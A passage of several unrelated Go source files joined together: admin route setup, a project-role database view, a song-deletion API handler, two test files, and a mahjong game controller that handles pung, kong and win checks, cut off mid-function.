"festival/app/common/router"
"festival/app/controller/module"
)
// WeChat user module routes.
// Powered by 7be.cn.
func init() {
	// Admin module route group guarded by the auth middleware; the boolean
	// flag presumably marks the route as requiring authentication — confirm
	// against router.New's signature.
	g2 := router.New("admin", "/admin/module", auth.Auth)
	g2.GET("/members", true, module.ModMemberList)
	g2.GET("/member/edit", true, module.ModMemberEdit)
	g2.POST("/member/save", true, module.ModMemberSave)
	g2.POST("/member/del", true, module.ModMemberDel)
}
|
package view
import (
proj_model "github.com/caos/zitadel/internal/project/model"
"github.com/caos/zitadel/internal/project/repository/view"
"github.com/caos/zitadel/internal/project/repository/view/model"
"github.com/caos/zitadel/internal/view/repository"
)
const (
projectRoleTable = "management.project_roles"
)
// ProjectRoleByIDs loads a single project role identified by project, org and
// role key from the projection table.
func (v *View) ProjectRoleByIDs(projectID, orgID, key string) (*model.ProjectRoleView, error) {
	return view.ProjectRoleByIDs(v.Db, projectRoleTable, projectID, orgID, key)
}

// ResourceOwnerProjectRolesByKey lists the roles with the given key for a
// project, scoped to a resource owner.
func (v *View) ResourceOwnerProjectRolesByKey(projectID, resourceowner, key string) ([]*model.ProjectRoleView, error) {
	return view.ResourceOwnerProjectRolesByKey(v.Db, projectRoleTable, projectID, resourceowner, key)
}

// ResourceOwnerProjectRoles lists all roles of a project scoped to a resource
// owner.
func (v *View) ResourceOwnerProjectRoles(projectID, resourceowner string) ([]*model.ProjectRoleView, error) {
	return view.ResourceOwnerProjectRoles(v.Db, projectRoleTable, projectID, resourceowner)
}

// SearchProjectRoles runs a filtered search, returning the matching roles and
// the total count.
func (v *View) SearchProjectRoles(request *proj_model.ProjectRoleSearchRequest) ([]*model.ProjectRoleView, int, error) {
	return view.SearchProjectRoles(v.Db, projectRoleTable, request)
}
// PutProjectRole upserts the project role row and then records the role's
// event sequence as processed.
func (v *View) PutProjectRole(project *model.ProjectRoleView) error {
	err := view.PutProjectRole(v.Db, projectRoleTable, project)
	if err != nil {
		return err
	}
	return v.ProcessedProjectRoleSequence(project.Sequence)
}
// DeleteProjectRole removes the project role row identified by projectID,
// orgID and key, then records eventSequence as processed.
func (v *View) DeleteProjectRole(projectID, orgID, key string, eventSequence uint64) error {
	err := view.DeleteProjectRole(v.Db, projectRoleTable, projectID, orgID, key)
	if err != nil {
		// Bug fix: this previously returned nil, silently swallowing the
		// delete error (consistent siblings like PutProjectRole return err).
		return err
	}
	return v.ProcessedProjectRoleSequence(eventSequence)
}
// GetLatestProjectRoleSequence returns the last processed event sequence for
// the project-role projection.
func (v *View) GetLatestProjectRoleSequence() (*repository.CurrentSequence, error) {
	return v.latestSequence(projectRoleTable)
}

// ProcessedProjectRoleSequence persists eventSequence as the latest processed
// sequence for the projection.
func (v *View) ProcessedProjectRoleSequence(eventSequence uint64) error {
	return v.saveCurrentSequence(projectRoleTable, eventSequence)
}

// GetLatestProjectRoleFailedEvent returns the stored failed event for the
// given sequence, if any.
func (v *View) GetLatestProjectRoleFailedEvent(sequence uint64) (*repository.FailedEvent, error) {
	return v.latestFailedEvent(projectRoleTable, sequence)
}

// ProcessedProjectRoleFailedEvent records a failed event for later retry or
// inspection.
func (v *View) ProcessedProjectRoleFailedEvent(failedEvent *repository.FailedEvent) error {
	return v.saveFailedEvent(failedEvent)
}
|
package api
import (
"encoding/json"
"net/http"
"github.com/kevguy/My-Shitty-Music-Backend/models"
"github.com/kevguy/My-Shitty-Music-Backend/util"
)
// DeleteSongEndPoint deletes a song. The song to delete is decoded from the
// JSON request body; a malformed payload yields 400 and a DAO failure 500.
func DeleteSongEndPoint(w http.ResponseWriter, r *http.Request) {
	defer r.Body.Close()

	var song models.Song
	err := json.NewDecoder(r.Body).Decode(&song)
	if err != nil {
		util.RespondWithError(w, http.StatusBadRequest, "Invalid request payload")
		return
	}

	err = shittyMusicDao.DeleteSong(song)
	if err != nil {
		util.RespondWithError(w, http.StatusInternalServerError, err.Error())
		return
	}

	util.RespondWithJSON(w, http.StatusOK, map[string]string{"result": "success"})
}
|
package display
import (
"strings"
"testing"
"github.com/AnuchitPrasertsang/roshambo/decide"
)
var titleLength = 26
// assertMePosition fails the test unless the substring "me" starts at
// position 4 of the rendered title.
func assertMePosition(title string, t *testing.T) {
	got := strings.Index(title, "me")
	if got != 4 {
		t.Error("me should be at position 4 but got ", got)
	}
}
// assertComputerPosition fails the test unless the substring "computer"
// starts at position p of the rendered title.
func assertComputerPosition(title string, p int, t *testing.T) {
	got := strings.Index(title, "computer")
	if got != p {
		t.Error("computer should be at position ", p, " but got ", got)
	}
}
// TestTitleShouldBeFixedLengthWhenWIN checks label positions in a WIN title.
// (Identifier typo "FixLenght" corrected to "FixedLength"; test functions are
// only invoked by the framework, so the rename is safe.)
func TestTitleShouldBeFixedLengthWhenWIN(t *testing.T) {
	title := Title(decide.WIN)
	assertMePosition(title, t)
	assertComputerPosition(title, 17, t)
}

// TestTitleShouldBeFixedLengthWhenLOSS checks label positions in a LOSS title.
func TestTitleShouldBeFixedLengthWhenLOSS(t *testing.T) {
	title := Title(decide.LOSS)
	assertMePosition(title, t)
	assertComputerPosition(title, 18, t)
}

// TestTitleShouldBeFixedLengthWhenTIE checks label positions in a TIE title.
func TestTitleShouldBeFixedLengthWhenTIE(t *testing.T) {
	title := Title(decide.TIE)
	assertMePosition(title, t)
	assertComputerPosition(title, 19, t)
}
|
// Copyright (c) 2018, Sylabs Inc. All rights reserved.
// This software is licensed under a 3-clause BSD license. Please consult the
// LICENSE.md file distributed with the sources of this project regarding your
// rights to use or distribute this software.
package client
import (
"context"
"net/http"
"reflect"
"testing"
jsonresp "github.com/sylabs/json-resp"
)
// Test_Search drives Client.Search against a mocked service, covering valid
// single/multi-argument queries and the error statuses.
func Test_Search(t *testing.T) {
	tests := []struct {
		description   string
		code          int
		body          interface{}
		reqCallback   func(*http.Request, *testing.T)
		searchArgs    map[string]string
		expectResults *SearchResults
		expectError   bool
	}{
		{
			description: "ValidRequest",
			searchArgs: map[string]string{
				"value": "test",
			},
			code:          http.StatusOK,
			body:          jsonresp.Response{Data: testSearch},
			expectResults: &testSearch,
			expectError:   false,
		},
		{
			description: "ValidRequestMultiArg",
			searchArgs: map[string]string{
				"value":  "test",
				"arch":   "x86_64",
				"signed": "true",
			},
			code:          http.StatusOK,
			body:          jsonresp.Response{Data: testSearch},
			expectResults: &testSearch,
			expectError:   false,
		},
		{
			description: "InternalServerError",
			searchArgs:  map[string]string{"value": "test"},
			code:        http.StatusInternalServerError,
			expectError: true,
		},
		{
			description: "BadRequest",
			searchArgs:  map[string]string{},
			code:        http.StatusBadRequest,
			expectError: true,
		},
		{
			description: "InvalidValue",
			searchArgs:  map[string]string{"value": "aa"},
			code:        http.StatusBadRequest,
			expectError: true,
		},
	}

	// Loop over test cases
	for _, tt := range tests {
		t.Run(tt.description, func(t *testing.T) {
			m := mockService{
				t:           t,
				code:        tt.code,
				body:        tt.body,
				reqCallback: tt.reqCallback,
				httpPath:    "/v1/search",
			}

			m.Run()
			defer m.Stop()

			c, err := NewClient(&Config{AuthToken: testToken, BaseURL: m.baseURI})
			if err != nil {
				// Bug fix: this was t.Errorf, which let the test continue
				// and dereference an unusable client below.
				t.Fatalf("Error initializing client: %v", err)
			}

			results, err := c.Search(context.Background(), tt.searchArgs)
			if err != nil && !tt.expectError {
				t.Errorf("Unexpected error: %v", err)
			}
			if err == nil && tt.expectError {
				t.Errorf("Unexpected success. Expected error.")
			}
			if !reflect.DeepEqual(results, tt.expectResults) {
				t.Errorf("Got created collection %v - expected %v", results, tt.expectResults)
			}
		})
	}
}
|
package majiangserver
import (
cmn "common"
"logger"
"math"
//"rpc"
//"strconv"
)
// MaJiangController drives one player's mahjong actions (bao, hu, gang
// checks), delegating win detection to its HuController.
type MaJiangController struct {
	player       *MaJiangPlayer
	huController *HuController
}
// NewController builds a MaJiangController bound to the given player with a
// fresh HuController for win detection.
func NewController(player *MaJiangPlayer) *MaJiangController {
	return &MaJiangController{
		player:       player,
		huController: NewHuController(player),
	}
}
// CheckBao reports whether the player can declare "bao" — i.e. whether at
// least one winning card currently exists — and returns those cards.
func (controller *MaJiangController) CheckBao() (bool, []*MaJiangCard) {
	huPais := controller.CheckHu(false)
	PrintCardsS("检查报时,能胡的牌:", huPais)
	// len(nil) == 0, so the previous explicit nil check was redundant.
	return len(huPais) > 0, huPais
}
// Bao declares "bao": every card in the player's hand is flipped face-down
// and locked, and the minimum multiplier for the bao pattern is recorded.
func (controller *MaJiangController) Bao() {
	// Validate arguments.
	player := controller.player
	if player == nil {
		logger.Error("controller.player is nil")
		return
	}
	// Lock every card in the hand.
	for i := range player.cards {
		player.cards[i].flag = cmn.CBack | cmn.CLock
	}
	player.multipleCount[MTBao] = MinTangFanShu[MTBao]
}
// CheckHu computes the set of cards the player could currently win ("hu") on.
// isCheckQiHuKeAmount additionally enforces the minimum "ke" amount required
// to declare a win. Returns nil when the player state is not initialised.
func (controller *MaJiangController) CheckHu(isCheckQiHuKeAmount bool) []*MaJiangCard {
	// Validate arguments.
	player := controller.player
	if player == nil || player.cards == nil || len(player.cards) <= 0 {
		logger.Error("data of player isn't init.")
		return nil
	}
	// Run the win calculation through huController.
	PrintCardsS("更新胡时的手牌:", player.cards)
	PrintPatternsS("更新胡时的已碰或杠的牌:", player.showPatterns)
	controller.huController.UpdateData(player.cards)
	PrintPatternGroupsS("更新胡牌后的模式组:", controller.huController.patternGroups, false)
	return player.GetHuCards(isCheckQiHuKeAmount)
}
// CheckHuSpecific reports whether the player can win on the specific card,
// and the best "ke" amount achievable with it. A red dragon (HongZhong) acts
// as a wildcard, so every winnable substitution is tried and the maximum ke
// kept. "Passed-up win" (guo shui) and value-increase rules can still veto
// the result at the end.
func (controller *MaJiangController) CheckHuSpecific(card *MaJiangCard) (result bool, ke int32) {
	// Validate arguments.
	if card == nil {
		logger.Error("card is nil.")
		return
	}
	player := controller.player
	if player == nil || player.room == nil {
		logger.Error("MaJiangController.player or player room is nil")
		return
	}
	huPais := controller.CheckHu(true)
	if huPais == nil || len(huPais) <= 0 {
		return
	}
	PrintCardS("CheckHuSpecific:检查能胡指定牌:", card)
	PrintCardsS("全部能胡的牌:", huPais)
	if card.cType == HongZhong {
		// controller.huController.UpdateData(player.cards)
		// PrintPatternGroupsS("更新胡牌后的模式组:", controller.huController.patternGroups, false)
		// return player.GetHuCards(isCheckQiHuKeAmount)
		// Wildcard: substitute the red dragon for each winnable card and
		// keep the substitution with the highest ke.
		var maxKe int32 = 0
		tempCard := *card
		for _, v := range huPais {
			tempCard.SetHZReplaceValue(v.cType, v.value)
			ke, _ = player.GetMaxHuOfPatternGroupByCard(&tempCard)
			if ke > maxKe {
				maxKe = ke
				result = true
			}
		}
		ke = maxKe
	} else {
		// Plain card: it must literally be among the winnable cards.
		for _, v := range huPais {
			if v.IsEqual(card) {
				ke, _ = player.GetMaxHuOfPatternGroupByCard(card)
				if ke > 0 {
					result = true
				}
			}
		}
	}
	// Apply the "passed-up win" (guo shui) and value-increase restrictions.
	isZiMo := card.owner == nil || card.owner.id == player.id
	if player.aroundState.IsOnlyZiMo() && !isZiMo {
		result = false
	}
	if !isZiMo && !player.aroundState.IsGuoShuiHu() && !player.aroundState.IsShengZhiHu(ke) {
		result = false
	}
	//logger.Error("玩家:%s 检查胡时,过水和升值的情况:是否是自摸:%s, 是否仅自摸:%s, 是否过水了:%s, 是否是升值:%s, 以前的颗数是:%d", player.client.GetName(), isZiMo, player.aroundState.IsOnlyZiMo(), player.aroundState.IsGuoShuiHu(), player.aroundState.IsShengZhiHu(ke), player.aroundState.huKe)
	return
}
// Hu performs the win ("hu") on the given card: it selects the best winning
// pattern group, flags the winning card with the win type (heavenly hand,
// self-drawn, discard, kong-related variants), tallies multipliers, merges
// the winning patterns into the player's exposed patterns, clears the hand
// and records which players pay. Returns false when the win is impossible.
func (controller *MaJiangController) Hu(card *MaJiangCard) bool {
	// Validate arguments.
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return false
	}
	room := player.room
	if room == nil {
		logger.Error("MaJiangController.player.room is nil")
		return false
	}
	// Pick the highest-scoring winning pattern group; this also adjusts the
	// player's fixed patterns and hand cards. A red dragon is a wildcard, so
	// every winnable substitution is tried and the best one kept.
	var maxPatternGroup *MaJiangPatternGroup = nil
	if card.IsHongZhong() {
		var maxKe int32 = 0
		huPais := controller.CheckHu(true)
		if huPais == nil || len(huPais) <= 0 {
			logger.Error("不能会牌啊!,怎么会执行胡操作呢!")
			return false
		}
		tempCard := *card
		for _, v := range huPais {
			tempCard.SetHZReplaceValue(v.cType, v.value)
			ke, patternGroup := player.GetMaxHuOfPatternGroupByCard(&tempCard)
			if ke > maxKe {
				maxKe = ke
				maxPatternGroup = patternGroup
				card.SetHZReplaceValue(v.cType, v.value)
			}
		}
	} else {
		_, maxPatternGroup = player.GetMaxHuOfPatternGroupByCard(card)
	}
	if maxPatternGroup == nil {
		logger.Error("没哟胡的模式组哦!", ConvertToWord(card))
		return false
	}
	// If the leaning cards are a pair, the win may also complete a triplet;
	// build the final pattern(s) from them plus the winning card.
	//var lastPattern *MaJiangPattern = nil
	lastPatterns := CalcPatternType(maxPatternGroup.kaoCards, card)
	if len(lastPatterns) <= 0 {
		// Fallback: wrap the cards in an unknown pattern so the win can
		// still be recorded.
		logger.Error("最后一个/两个模式生成失败!")
		cardList := []*MaJiangCard{card}
		cardList = append(cardList, maxPatternGroup.kaoCards...)
		lastPatterns = append(lastPatterns, NewPattern(PTUknown, cardList, false))
	}
	// if ptype != PTUknown {
	// 	cardList := []*MaJiangCard{card}
	// 	cardList = append(cardList, maxPatternGroup.kaoCards...)
	// 	lastPattern = NewPattern(ptype, cardList, false)
	// } else {
	// 	logger.Error("胡牌的最有一个模式不应该是个未知的模式")
	// 	PrintCardsS("靠牌:", maxPatternGroup.kaoCards)
	// 	PrintCardS("胡牌:", card)
	// 	//异常兼容代码
	// 	cardList := []*MaJiangCard{card}
	// 	cardList = append(cardList, maxPatternGroup.kaoCards...)
	// 	lastPattern = NewPattern(ptype, cardList, false)
	// }
	// Flag the winning card with the appropriate win type.
	card.flag |= cmn.CHu
	if room.state == RSBankerTianHuStage {
		card.flag |= cmn.CTianHu
	} else {
		isZiMo := card.owner == nil || card.owner.id == player.id
		if isZiMo {
			card.flag |= cmn.CZiMoHu
			// Check for a win on the replacement draw after a kong.
			if player.aroundState.HaveGangShangHuaFlag() {
				card.flag |= cmn.CGangShangHu
			}
		} else {
			card.flag |= cmn.CDianPaoHu
			if card.owner != nil && card.owner.aroundState.HaveGangShangPaoFlag() {
				card.flag |= cmn.CGangShangPaoHu
			}
		}
	}
	// Tally the final scoring patterns ("ming tang") and multipliers.
	_, _, remainMingTang := player.CalcMulitAndKeByPatternGroup(maxPatternGroup, card)
	for k, v := range remainMingTang {
		player.multipleCount[k] = v
	}
	// Cache the winning card: it must be re-sent to the client on re-login.
	player.huCard = card
	// Merge the winning patterns into the player's exposed patterns.
	player.showPatterns = append(player.showPatterns, maxPatternGroup.patterns...)
	if lastPatterns != nil {
		player.showPatterns = append(player.showPatterns, lastPatterns...)
	}
	// Clear the hand.
	player.cards = []*MaJiangCard{}
	// Record which players pay for this win, for settlement scoring.
	if player.isChaJiaoHu {
		for _, p := range room.players {
			if !p.IsHu() && !p.HaveJiao() {
				player.beiHuPlayers = append(player.beiHuPlayers, p)
			}
		}
	} else {
		if player.HaveZiMoFeatureForHu() {
			for _, p := range room.players {
				if !p.IsHu() {
					player.beiHuPlayers = append(player.beiHuPlayers, p)
				}
			}
		} else {
			if card.owner != nil && !card.owner.IsHu() {
				player.beiHuPlayers = append(player.beiHuPlayers, card.owner)
			} else {
				logger.Error("竟然都是杠上炮,抢杠或点炮了,这个牌竟然还不知道是谁的!")
			}
		}
	}
	return true
	// PrintPatternsS("胡牌时玩家的显示牌如下:", player.showPatterns)
	// PrintCardsS("当前玩家的手牌:", player.cards)
	// logger.Info("玩家%s 胡牌了:", player.id, ConvertToWord(card))
}
// CheckAnGang reports whether the player can declare a concealed kong
// (an gang) and returns the candidate cards. When addiCard is non-nil it
// is counted as part of the hand (a just-drawn card).
func (controller *MaJiangController) CheckAnGang(addiCard *MaJiangCard) (canGang bool, result []*MaJiangCard) {
	result = make([]*MaJiangCard, 0)
	// Validate state.
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	cardAmountInfo := player.cardAmountInfo
	if addiCard != nil {
		cardAmountInfo = NewCardAmountStatisticsByCards(append(player.cards, addiCard), false)
	}
	// Cards that can form a "hard" kong (four natural copies in hand).
	yingGang := cardAmountInfo.GetCardsBySpecificAmount(4, nil)
	// Cards that would need red-dragon (hong zhong) wildcards to reach four.
	var hongZhongAmount int32 = 0
	if player.IsOpenHongZhongCheck {
		hongZhongAmount = cardAmountInfo.GetCardAmountByType(HongZhong)
	}
	canGangCards := cardAmountInfo.GetCardsBySpecificAmount(int32(math.Max(float64(1), float64(4-hongZhongAmount))), yingGang)
	canGangCards = append(canGangCards, yingGang...)
	types := player.GetCurMayOwnTypes()
	for _, c := range canGangCards {
		// The red dragon itself is never the kong card.
		if c.cType == HongZhong {
			continue
		}
		if Exist(types, c.cType) {
			result = append(result, c)
		}
	}
	// After a "bao" declaration, re-check which kongs are still allowed.
	canGang = len(result) > 0
	if canGang {
		result = controller.FilterNoGangForBaoPlayer(result, 4)
	}
	return len(result) > 0, result
}
// AnGang performs a concealed kong by delegating to Gang with the
// four-card requirement.
func (controller *MaJiangController) AnGang(card *MaJiangCard) (result *MaJiangPattern) {
	result = controller.Gang(card, 4)
	return
}
// CheckMingGang reports whether the player can claim an exposed kong
// (ming gang) on card; isNeedHongZhong is true when red-dragon wildcards
// are required to complete it.
func (controller *MaJiangController) CheckMingGang(card *MaJiangCard) (result, isNeedHongZhong bool) {
	// Validate arguments. The early return is required: without it a nil
	// card would be dereferenced by card.IsHongZhong() below.
	if card == nil {
		logger.Error("MaJiangController.card is nil")
		return
	}
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	// The red dragon can never be kong'ed from another player's discard.
	if card.IsHongZhong() {
		return
	}
	// Respect the "guo shui" (passed) restriction.
	if !player.aroundState.IsGuoShuiPengGang(card) {
		return
	}
	cardAmount := player.cardAmountInfo.GetCardAmount(card.cType, card.value)
	if cardAmount <= 0 {
		return
	}
	// Fewer than three natural copies means wildcards are needed.
	isNeedHongZhong = cardAmount < int32(3)
	var hongZhongAmount int32 = 0
	if player.IsOpenHongZhongCheck && isNeedHongZhong {
		hongZhongAmount = player.cardAmountInfo.GetCardAmountByType(HongZhong)
	}
	if hongZhongAmount+cardAmount >= 3 {
		types := player.GetCurMayOwnTypes()
		if Exist(types, card.cType) {
			// "Bao" players may be barred from this kong.
			filtered := controller.FilterNoGangForBaoPlayer([]*MaJiangCard{card}, 3)
			result = len(filtered) > 0
			return
		}
	}
	return
}
// MingGang performs an exposed kong by delegating to Gang with the
// three-card requirement (the claimed card supplies the fourth).
func (controller *MaJiangController) MingGang(card *MaJiangCard) (result *MaJiangPattern) {
	result = controller.Gang(card, 3)
	return
}
// FilterNoGangForBaoPlayer removes kong candidates that a "bao"
// (declared-ready) player may not take: after removing the kong cards
// the remaining hand must still hold a winning decomposition, otherwise
// that kong is disallowed. needCardAmount is how many copies come from
// the hand (3 for an exposed kong, 4 for a concealed one).
func (controller *MaJiangController) FilterNoGangForBaoPlayer(gangCards []*MaJiangCard, needCardAmount int32) (result []*MaJiangCard) {
	// Single allocation; the original allocated result twice.
	result = make([]*MaJiangCard, 0, len(gangCards))
	if len(gangCards) == 0 {
		return
	}
	result = append(result, gangCards...)
	player := controller.player
	if controller.player == nil {
		logger.Error("MaJiangController.FilterNoGangForBaoPlayer: controller.player is nil")
		return
	}
	if player.HaveBao() {
		tempResult := make([]*MaJiangCard, 0)
		for _, gangCard := range gangCards {
			// Work on a copy of the hand.
			tempCards := make([]*MaJiangCard, len(player.cards))
			copy(tempCards, player.cards)
			// Remove the kong cards from the copy.
			var removedCards []*MaJiangCard
			tempCards, removedCards = RemoveCardsByType(tempCards, gangCard.cType, gangCard.value, needCardAmount)
			// If the hand lacks enough natural copies, substitute
			// red-dragon wildcards.
			needRemovedHongZhongAmount := needCardAmount - int32(len(removedCards))
			if needRemovedHongZhongAmount > 0 {
				tempCards, _ = RemoveCardsByType(tempCards, HongZhong, 0, needRemovedHongZhongAmount)
			}
			// Keep the candidate only if the remaining hand can still win.
			huChecker := NewHuController(player)
			huChecker.UpdateData(tempCards)
			haveHu := huChecker.patternGroups != nil && len(huChecker.patternGroups) > 0
			if haveHu {
				tempResult = append(tempResult, gangCard)
			}
		}
		result = tempResult
	}
	return
}
// Gang removes needCardAmount copies of card from the hand (topping up
// with red-dragon wildcards when short), records the kong pattern on the
// player's shown melds, and refreshes the win checker and card-count
// caches. needCardAmount is 3 for an exposed kong (the claimed card
// completes it) and 4 for a concealed kong.
func (controller *MaJiangController) Gang(card *MaJiangCard, needCardAmount int32) (result *MaJiangPattern) {
	// Validate arguments.
	if card == nil {
		logger.Error("MaJiangController.AnGang card is nil")
		return
	}
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	// The red dragon may not be kong'ed directly.
	// NOTE(review): this branch only logs and then falls through — confirm
	// whether an early return was intended here.
	if card.IsHongZhong() {
		logger.Error("红中不能够暗杠红中这张牌", ConvertToWord(card))
	}
	// Remove the kong cards from the hand.
	removedCards := make([]*MaJiangCard, 0)
	removedHongZhongCards := make([]*MaJiangCard, 0)
	player.cards, removedCards = RemoveCardsByType(player.cards, card.cType, card.value, needCardAmount)
	// If the hand lacks enough natural copies, substitute red-dragon wildcards.
	needRemovedHongZhongAmount := needCardAmount - int32(len(removedCards))
	if needRemovedHongZhongAmount > 0 {
		player.cards, removedHongZhongCards = RemoveCardsByType(player.cards, HongZhong, 0, needRemovedHongZhongAmount)
	}
	// Pin each wildcard to the kong'ed card's suit/value and lock it.
	for _, hongZhongCard := range removedHongZhongCards {
		if hongZhongCard == nil {
			continue
		}
		hongZhongCard.SetHZReplaceValue(card.cType, card.value)
		hongZhongCard.flag = cmn.CLockHongZhongValue | cmn.CLock | cmn.CPositive
	}
	// Build the kong pattern; an exposed kong also includes the claimed card.
	resultCards := append(removedCards, removedHongZhongCards...)
	isMingGang := needCardAmount == 3
	if isMingGang {
		resultCards = append(resultCards, card)
		result = NewPattern(PTGang, resultCards, true)
	} else {
		result = NewPattern(PTAnGang, resultCards, true)
	}
	// Expose the new meld.
	player.showPatterns = append(player.showPatterns, result)
	// Clear the "passed water" / value-raise flags.
	player.aroundState.ClearGuoShuiAndShengZhiFlag(player.HaveBao())
	// Record the kong so "flower/cannon after kong" wins can be detected.
	//player.aroundState.gangCard = card
	player.aroundState.AddGangFlag(card)
	// The hand changed, so refresh the win checker...
	controller.huController.UpdateData(player.cards)
	// ...and recompute the cached per-card counts.
	player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
	return
}
// CheckBuGang reports whether the player can upgrade an existing pung
// (peng) into a kong, returning the candidate cards. When addiCard is
// non-nil it is counted as part of the hand.
func (controller *MaJiangController) CheckBuGang(addiCard *MaJiangCard) (canBuGang bool, result []*MaJiangCard) {
	result = make([]*MaJiangCard, 0)
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	// Only already-pung'ed cards can be upgraded.
	pengCards := player.GetPengCardsForAlready()
	if len(pengCards) <= 0 {
		return
	}
	// Collect the full hand (optionally including the just-drawn card).
	cards := player.cards
	if addiCard != nil {
		cards = append(player.cards, addiCard)
	}
	haveHongZhongInHand := false
	for _, handCard := range cards {
		// A hand card matching a pung'ed card can complete that kong.
		for _, c := range pengCards {
			if handCard.IsEqual(c) {
				if !IsExist(result, handCard) {
					result = append(result, handCard)
				}
			}
		}
		// When enabled, a red-dragon wildcard in hand makes every pung
		// upgradable; this expansion is applied at most once.
		if player.IsOpenHongZhongCheck && !haveHongZhongInHand && handCard.cType == HongZhong {
			for _, c := range pengCards {
				if !IsExist(result, c) {
					result = append(result, c)
				}
			}
			haveHongZhongInHand = true
		}
	}
	return len(result) > 0, result
}
// BuGang upgrades a pung to a kong using card: one matching hand card
// (or a red-dragon wildcard when no natural copy exists) is moved onto
// the existing pung. It returns the card actually used and the updated
// pattern; both are nil when no usable card was found.
func (controller *MaJiangController) BuGang(card *MaJiangCard) (buCard *MaJiangCard, result *MaJiangPattern) {
	// Validate arguments.
	if card == nil {
		logger.Error("MaJiangController.card is nil.")
		return
	}
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	// Resolve the concrete suit/value the kong needs (a wildcard's current
	// replacement value counts).
	removedCards := make([]*MaJiangCard, 0)
	cType, cValue := card.CurValue()
	// Prefer the natural card; fall back to a red-dragon wildcard.
	player.cards, removedCards = RemoveCardsByType(player.cards, cType, cValue, 1)
	if len(removedCards) <= 0 {
		// Remove one red dragon instead.
		player.cards, removedCards = RemoveCardsByType(player.cards, HongZhong, 0, 1)
	}
	// Attach the removed card to the pung, locking a wildcard's value.
	if len(removedCards) != 1 {
		logger.Error("没有此牌%s,如何补杠.被移除的牌的数量:%d", ConvertToWord(card), len(removedCards))
		PrintCardsS("此时玩家手上的牌是:", player.cards)
	} else {
		buCard = removedCards[0]
		if buCard.IsHongZhong() {
			buCard.SetHZReplaceValue(cType, cValue)
			buCard.flag = cmn.CLockHongZhongValue | cmn.CLock | cmn.CPositive
		}
		result = player.AddOneBuGangCard(buCard)
	}
	// The hand changed, so refresh the win checker...
	controller.huController.UpdateData(player.cards)
	// ...and recompute the cached per-card counts.
	player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
	return
}
// CheckPeng reports whether the player can claim a pung on card;
// isNeedHongZhong is true when a red-dragon wildcard is needed to
// complete the in-hand pair.
func (controller *MaJiangController) CheckPeng(card *MaJiangCard) (canPeng, isNeedHongZhong bool) {
	// Validate arguments.
	if card == nil {
		logger.Error("MaJiangController.card is nil.")
		return
	}
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	// The red dragon is never pung'ed.
	if card.IsHongZhong() {
		return
	}
	// Respect the "guo shui" (passed) restriction.
	if !player.aroundState.IsGuoShuiPengGang(card) {
		return
	}
	types := player.GetCurMayOwnTypes()
	if Exist(types, card.cType) {
		selfAmount := player.cardAmountInfo.GetCardAmount(card.cType, card.value)
		// No natural copy of this card in hand at all.
		if selfAmount <= 0 {
			return false, false
		}
		isNeedHongZhong = selfAmount < 2
		if !isNeedHongZhong {
			return true, false
		}
		// Only one copy in hand: a wildcard may fill in when enabled.
		if player.IsOpenHongZhongCheck {
			hongZhongAmount := player.cardAmountInfo.GetCardAmountByType(HongZhong)
			return hongZhongAmount+selfAmount >= 2, true
		}
	}
	return
}
// Peng claims a pung on card: two matching hand cards (topped up with
// red-dragon wildcards when short) plus the claimed card form the
// exposed meld, and the win checker / card-count caches are refreshed.
func (controller *MaJiangController) Peng(card *MaJiangCard) (result *MaJiangPattern) {
	// Validate arguments.
	if card == nil {
		logger.Error("MaJiangController.card is nil.")
		return
	}
	player := controller.player
	if player == nil {
		logger.Error("MaJiangController.player is nil")
		return
	}
	// Remove the two matching cards from the hand.
	removedCards := make([]*MaJiangCard, 0)
	removedHongZhongCards := make([]*MaJiangCard, 0)
	player.cards, removedCards = RemoveCardsByType(player.cards, card.cType, card.value, 2)
	// If the hand lacks enough natural copies, substitute red-dragon wildcards.
	needRemovedHongZhongAmount := 2 - int32(len(removedCards))
	if needRemovedHongZhongAmount > 0 {
		player.cards, removedHongZhongCards = RemoveCardsByType(player.cards, HongZhong, 0, needRemovedHongZhongAmount)
	}
	// Pin each wildcard to the pung'ed card's suit/value and lock it.
	for _, hongZhongCard := range removedHongZhongCards {
		if hongZhongCard == nil {
			continue
		}
		hongZhongCard.SetHZReplaceValue(card.cType, card.value)
		hongZhongCard.flag = cmn.CLockHongZhongValue | cmn.CLock | cmn.CPositive
	}
	// Build the pung pattern from hand cards plus the claimed card.
	pengCards := append(removedCards, removedHongZhongCards...)
	pengCards = append(pengCards, card)
	result = NewPattern(PTKan, pengCards, true)
	// Expose the new meld.
	player.showPatterns = append(player.showPatterns, result)
	// Clear the "passed water" / value-raise flags.
	player.aroundState.ClearGuoShuiAndShengZhiFlag(player.HaveBao())
	// The hand changed, so refresh the win checker...
	controller.huController.UpdateData(player.cards)
	// ...and recompute the cached per-card counts.
	player.cardAmountInfo.CalcCardAmountByCards(player.cards, false)
	return
}
// CalcPatternType builds the closing meld(s) formed by the winning card
// together with the 1, 2 or 4 leftover "kao" cards: a pair, a triplet,
// a run, or (for 4 leftovers) a triplet plus a pair. An empty result
// means no valid closing meld could be formed.
func CalcPatternType(kaoCards []*MaJiangCard, huCard *MaJiangCard) (result []*MaJiangPattern) {
	result = []*MaJiangPattern{}
	if huCard == nil {
		logger.Error("MaJiangController.card is nil.")
		return
	}
	kaoCardsAmount := len(kaoCards)
	if kaoCardsAmount <= 0 || kaoCardsAmount > 4 {
		logger.Error("kaoCardsAmount is empty or greater 4.")
		return
	}
	// Candidate card list: winning card first, then the leftovers.
	cardList := []*MaJiangCard{huCard}
	cardList = append(cardList, kaoCards...)
	switch kaoCardsAmount {
	case 1:
		// One leftover: the winning card must pair with it.
		if kaoCards[0].IsEqual(huCard) {
			result = append(result, NewPattern(PTPair, cardList, false))
			return
		}
	case 2:
		kaoCard1 := kaoCards[0]
		kaoCard2 := kaoCards[1]
		// Two equal leftovers plus a matching winning card form a triplet.
		if kaoCard1.IsEqual(kaoCard2) {
			// Triplet win.
			if kaoCard1.IsEqual(huCard) {
				result = append(result, NewPattern(PTKan, cardList, false))
